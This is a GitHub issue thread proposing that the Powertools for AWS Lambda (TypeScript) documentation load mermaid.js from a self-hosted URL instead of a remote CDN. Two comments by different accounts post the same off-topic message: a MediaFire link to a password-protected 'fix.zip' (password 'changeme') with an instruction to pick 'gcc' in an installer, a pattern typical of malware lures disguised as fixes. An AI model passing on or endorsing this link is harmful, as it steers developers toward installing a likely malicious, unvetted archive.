### ISSUE TITLE
Maintenance: update docs to use self-hosted mermaid.js script

### ISSUE THREAD

**Issue by dreamorosi** [aws-powertools/powertools-lambda-typescript#2976]
### Summary

We use [mermaid for diagrams](https://mermaid.js.org) in a few of our documentation pages and the documentation engine we use defaults to loading the script from a remote CDN. 

### Why is this needed?

To further improve our security posture we should switch to self hosting the script.

### Which area does this relate to?

Other

### Solution

Update the `mkdocs.yml` file and point it to https://docs.powertools.aws.dev/shared/mermaid.min.js

### Acknowledgment

- [X] This request meets [Powertools for AWS Lambda (TypeScript) Tenets](https://docs.powertools.aws.dev/lambda/typescript/latest/#tenets)
- [ ] Should this be considered in other Powertools for AWS Lambda languages? i.e. [Python](https://github.com/aws-powertools/powertools-lambda-python/), [Java](https://github.com/aws-powertools/powertools-lambda-java/), and [.NET](https://github.com/aws-powertools/powertools-lambda-dotnet/)

### Future readers

Please react with 👍 and your use case to help us understand customer demand.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
